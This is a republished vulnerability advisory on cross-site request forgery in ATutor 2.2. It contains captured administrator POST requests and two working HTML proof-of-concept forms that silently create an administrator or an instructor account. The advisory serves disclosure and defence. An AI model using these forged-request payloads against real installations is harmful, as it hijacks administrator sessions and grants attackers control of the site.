ATutor 2.2 Cross-Site Request Forgery (CSRF) Vulnerability
Published on April 10th, 2020
Summary
Multiple cross-site request forgery (CSRF) vulnerabilities in ATutor 2.2 allow remote attackers to hijack the authentication of administrators
Credit:
The information has been provided by Edric Teo
The original article can be found at: https://seclists.org/bugtraq/2015/Mar/1
Details
1) CSRF in administrator creation page When an authenticated administrative user of ATutor LCMS is creating another administrator account, the following POST request is sent to the server: POST /atutor-2.2/ATutor/mods/_core/users/admins/create.php HTTP/1.1 Host: 127.0.0.1 Proxy-Connection: keep-alive Content-Length: 187 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/admins/create.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: ATutorID=pr6jq1tlfr204nm60p5rtbj0u4; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _gat=1; _ga=GA1.1.621011711.1425057132 form_password_hidden=ef0f8b6ffb699f90933a3321b00ff6769e018b94&password_error=&login=csrfadmin9&password=&confirm_password=&real_name=&email=csrfadmin9 () admin com&priv_admin=1&submit=Save By executing the following Proof-of-Concept, a new administrative user called "csrfadmin99" will be created with the password "1qazXSW@". <html> <body> <form action="http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/admins/create.php"; method="POST"> <input type="hidden" name="form_password_hidden" value="ef0f8b6ffb699f90933a3321b00ff6769e018b94" /> <input type="hidden" name="login" value="csrfadmin99" /> <input type="hidden" name="real_name" value="csrfadmin99" /> <input type="hidden" name="email" value="csrfadmin99 () admin com" /> <input type="hidden" name="priv_admin" value="1" /> <input type="hidden" name="submit" value="Save" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2) CSRF in user creation page When an authenticated administrative user of ATutor LCMS is creating an user, the following POST request is sent to the server: POST /atutor-2.2/ATutor/mods/_core/users/create_user.php HTTP/1.1 Host: 127.0.0.1 Proxy-Connection: keep-alive Content-Length: 429 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/create_user.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: ATutorID=0h3qqin6ndjmpt21m7f17i07l7; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _gat=1; _ga=GA1.1.621011711.1425057132 ml=&password_error=&form_password_hidden=ef0f8b6ffb699f90933a3321b00ff6769e018b94®istration_token=19569b3551f19d60ddfbe4973d1733079f775568&login=csrfuser9&form_password1=&form_password2=&email=csrfuser9 () user com&private_email=1&email2=csrfuser9 () user com&first_name=csrfuser9&second_name=&last_name=csrfuser9&id=&status=3&old_status=&year=&month=&day=&address=&postal=&city=&province=&country=&phone=&website=&submit=+Save+ By executing the following Proof-of-Concept, a new instructor user called "csrfuser99" will be created with the password "1qazXSW@". <html> <body> <form action="http://127.0.0.1/atutor-2.2/ATutor/mods/_core/users/create_user.php"; method="POST"> <input type="hidden" name="form_password_hidden" value="ef0f8b6ffb699f90933a3321b00ff6769e018b94" /> <input type="hidden" name="login" value="csrfuser99" /> <input type="hidden" name="email" value="csrfuser99 () user com" /> <input type="hidden" name="private_email" value="1" /> <input type="hidden" name="email2" value="csrfuser99 () user com" /> <input type="hidden" name="first_name" value="csrfuser99" /> <input type="hidden" name="last_name" value="csrfuser99" /> <input type="hidden" name="status" value="3" /> <input type="hidden" name="submit" value="Save" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Vulnerable System
ATutor 2.2
CVE Information:
Disclosure Timeline:
Published Date:03/01/2020